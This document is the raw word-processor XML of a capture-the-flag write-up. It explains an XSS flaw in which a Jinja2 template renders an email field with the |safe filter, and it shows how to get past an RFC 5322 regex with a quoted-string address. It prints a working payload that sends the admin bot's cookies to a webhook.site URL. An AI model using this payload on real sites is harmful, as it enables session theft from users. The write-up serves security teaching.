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2057400" cy="42454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70400" y="2245500"/>
                          <a:ext cx="3582000" cy="652500"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="151515"/>
                        </a:solidFill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RFCRFC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acee"/>
                                <w:sz w:val="48"/>
                                <w:vertAlign w:val="baseline"/>
                              </w:rPr>
                              <w:t xml:space="preserve">Writeup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57400" cy="424543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4245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0a4f4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="20a4f4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Web Security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6d9eeb"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="6d9eeb"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="228600" distT="228600" distL="228600" distR="228600">
            <wp:extent cx="1104900" cy="60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6d9ee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Prerequisites &amp; Requirements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web security concepts especially XSS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knowledge about jinja2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What will you learn?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Exploiting XSS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advantage of mail RFCs to exploit XSS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Tools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Webhook.site , Browser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 US.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Discovery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accessing the challenge, we’ll find a simple web page that asks you for your email and a question about why you want to register on their platform.</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">There is also an admin login panel.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After submitting the form, the application responds with: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unique application ID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message stating that if we don't receive an email response, we should "report to the bot"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Searching</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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dive into the source code analysis to understand the application's architecture and identify potential vulnerabilities.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uses Python as its backend framework. The most critical component we discover is the email validation regex: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Email validation regex according to RFC 5322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EMAIL_REGEX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r'^(?!\.)("([^"\\]|\\.)*"|[-a-zA-Z0-9!#$%&amp;\'*+/=?^_`{|}~]+(\.[-a-zA-Z0-9!#$%&amp;\'*+/=?^_`{|}~]+)*)@(?!-)([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}$'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author mentioned that the regex is based on RFC 5322 so what is RFC 5322:</w:t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 RFC 5322:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000025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RFC (Request for Comments) 5322 is the Internet Standard that defines the format of Internet Message Format - essentially how email addresses should be structured. This RFC is notoriously complex and includes several edge cases that developers often overlook when implementing email validation.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RFC allows for various email address formats, including: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format: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user@domain.com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Quoted strings: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"user name"@domain.com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characters within quotes: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"user+tag"@domain.com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user(comment)@domain.com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eg82hgfgip7k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Bot System Analysis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Examining the application structure, we find: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/bot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint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/Bot</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> directory in the file system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to automated application review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highly indicated that there is a xss.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6u7umdv3x8uc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Template Vulnerability Analysis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critical vulnerability lies in the HTML template rendering. Let's examine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review.html</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> template which is the template that being rendered as part of the admin dashboard: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abb2bf"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr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div </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="d19a66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="</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="98c379"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">application-details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"&gt;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Application ID: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{{ application.id }}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Email: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{{ application.email|safe }}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{{ application.note }}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&gt;&lt;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Current Status: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strong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{{ application.status }}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Jinja2 Template Security Analysis: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Jinja2 templating engine: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variable }}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Automatically HTML-escapes the content to prevent XSS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 variable|safe }}</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Bypasses HTML escaping, rendering raw content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vulnerability is clear: while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application.note</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> is automatically escaped,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application.email</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> uses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|safe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> filter, meaning any HTML/JavaScript content in the email field will be rendered directly without sanitisation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b w:val="1"/>
          <w:color w:val="20a4f4"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(Exploitation - Decoding)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000003F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="20a4f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attack strategy involves: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Crafting an XSS payload that appears to be a legitimate email address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Bypassing the RFC 5322 regex validation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Exploiting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|safe</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> filter in the template to execute JavaScript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Exfiltrating admin session data when the bot reviews our application</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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exploit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quoted-string</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> local-part format defined in RFC 5322.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RFC 5322 specification allows for quoted strings in the local part of email addresses, where special characters can be included within double quotes. The format is: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abb2b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"&lt;any-character-sequence&gt;"@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88038"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">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payload, we might use something like this as a request body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/register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email="&lt;img+src%3d1+onerror%3d'window.location.href%3d`http%3a//webhook.site/9a25bf32-aaaa-4a13-9296-38f349e7e3ad/%3f${document.cookie}`'&gt;"@k.co&amp;note=ww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Then get the id and report it to the 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&lt;img&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tag.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src=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> part is intentionally broken to trigger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onerror</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> event. When that happens, the JavaScript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onerror</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> handler executes. In this case, it captures the victim’s cookies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document.cookie</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and sends them to the attacker's webhook by altering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window.location.href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submit it. We’ll use Burp Repeater since the frontend won’t recognize this as a valid email.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Got the flag!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main.com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